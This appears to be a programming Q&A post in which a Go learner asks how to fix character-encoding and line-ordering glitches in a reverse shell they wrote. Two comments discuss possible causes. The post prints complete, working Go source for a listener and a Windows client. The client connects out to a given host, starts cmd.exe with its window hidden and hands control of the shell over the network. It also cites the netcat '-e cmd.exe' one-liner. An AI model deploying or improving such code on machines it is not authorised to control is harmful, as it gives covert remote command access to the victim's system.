# Golang creating simple reverse shell, synchronization and encoding problem

Tags: sockets, go

I'm learning basics of `golang` and thought about creating simple reverse shell, something to mimic for example  `nc <ip> <port> -e cmd.exe`. It is working somewhat but I want it to work better for example there is little encoding problem

This is output from my program some spaces and special characters like `ążłć` and so on and forth, and as you can see there is one line `Directory of D:\Projects\gorevshell` that should be third from top but is in the middle.

```
D:\Projects\gorevshell>dir
dir
 Volume in drive D is DATA
 Volume Serial Number is FA46-C237
02.05.2021  13:57    <DIR>          .
02.05.2021  13:57    <DIR>          ..
02.05.2021  09:56               289 .gitignore
01.05.2021  21:56    <DIR>          .vscode
02.05.2021  13:18         3�089�920 client.exe

 Directory of D:\Projects\gorevshell

02.05.2021  13:18             1�090 client.go
02.05.2021  13:57         2�877�440 main.exe
02.05.2021  13:56               883 main.go
02.05.2021  10:14               884 main.go.old
01.05.2021  21:25                12 README.md
               3 Dir(s)  61�482�332�160 bytes free

               7 File(s)      5�970�518 bytes
```

Or when executing powershell there is one trailing new line character

```
D:\Projects\gorevshell>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS D:\Projects\gorevshell> ls
ls


    Directory: D:\Projects\gorevshell


Mode                 LastWriteTime         Length Name

----                 -------------         ------ ----

d-----        01.05.2021     21:56                .vscode

-a----        02.05.2021     09:56            289 .gitignore

-a----        02.05.2021     13:18        3089920 client.exe

-a----        02.05.2021     13:18           1090 client.go

-a----        02.05.2021     13:57        2877440 main.exe

-a----        02.05.2021     13:56            883 main.go

-a----        02.05.2021     10:14            884 main.go.old

-a----        01.05.2021     21:25             12 README.md



PS D:\Projects\gorevshell>
```

I think this line out of sync could be caused by the two gorutines that copy from pipe to `stdout`. But for the encoding problem I have no idea. The out of sync lines are quite random, but encoding errors are constant. How do I get rid of encoding problems and sync all the data? And all other tips are welcome. Thanks.

Server source code

```golang
package main

import (
    "bufio"
    "flag"
    "fmt"
    "io"
    "log"
    "net"
    "os"
)

func main() {
    //Flags
    portPtr := flag.Int("p", 2137, "Listening port")
    listenPtr := flag.Bool("l", false, "Server mode")
    flag.Parse()
    log.Printf("portPtr %d, listenPtr %t", *portPtr, *listenPtr)

    //Start listenign on all on portPtr
    conn, err := net.Listen("tcp", fmt.Sprintf("0.0.0.0:%d", *portPtr))
    if err != nil {
        log.Fatal("Cannot bind to port")
    }
    //Accept incoming connection
    listener, err := conn.Accept()
    if err != nil {
        log.Fatal("Cannot accept connection")
    }
    //Print connections address and port 
    log.Printf("Connection from: %s", listener.RemoteAddr().String())
    shellPipeReader, shellPipeWriter := io.Pipe()
    for {
        //Copy data from listener(client, shell provider) to stdout gorutine to don't block code execution
        go io.Copy(shellPipeWriter, listener)
        go io.Copy(os.Stdout, shellPipeReader)
        //get user input aka commands to execute
        reader := bufio.NewReader(os.Stdin)
        text, err := reader.ReadString('\n')
        if err != nil {
            log.Fatal("Cannot send message")
        }
        //send commands to listener(client, shell provider)
        listener.Write([]byte(text))
    }

}
```

Client source code

```golang
package main

import (
    "flag"
    "fmt"
    "io"
    "log"
    "net"
    "os/exec"
    "syscall"
)

//function returns pointer to exec.Cmd object that is cmd shell
func Shell() *exec.Cmd {
    cmd := exec.Command("C:\\Windows\\System32\\cmd.exe")
    cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
    return cmd
}

func main() {
    //parse arguments
    flag.Parse()
    conn, err := net.Dial("tcp", fmt.Sprintf("%s:%s", flag.Arg(0), flag.Arg(1)))
    if err != nil {
        log.Fatal("Cannot connect to the server")
    }
    //calling shell
    shellCmd := Shell()
    //creating pipes not mess up with buffering too much
    shellPipeReader, shellPipeWriter := io.Pipe()
    //standard in is binded to connection
    shellCmd.Stdin = conn
    //standard err and standard out are binded to writer pipe
    shellCmd.Stdout = shellPipeWriter
    shellCmd.Stderr = shellPipeWriter
    //sending the output from shellPipeReader to connection, using gorutine to not block code execution
    go io.Copy(conn, shellPipeReader)
    //run the command
    shellCmd.Run()
    //Close connection after shell is dead
    conn.Close()

}
```

Comment: For the weird characters, I thought it might have to do with Windows' use of UTF-16 encoding (Go strings are UTF-8), but I can't come up with a situation where these issues happen. For the ordering of lines issue, I thought it might have to do with concurrent use of stdout and stderr, but I found that it was all outputting on stdout. So not really sure what's going on.

Comment: Ohhh right I forgot windows use UTF-16 not UTF-8 i'm going to fiddle with that thanks. And about ordering lines I think I'm going to need come up with different solution then. Thank you for answering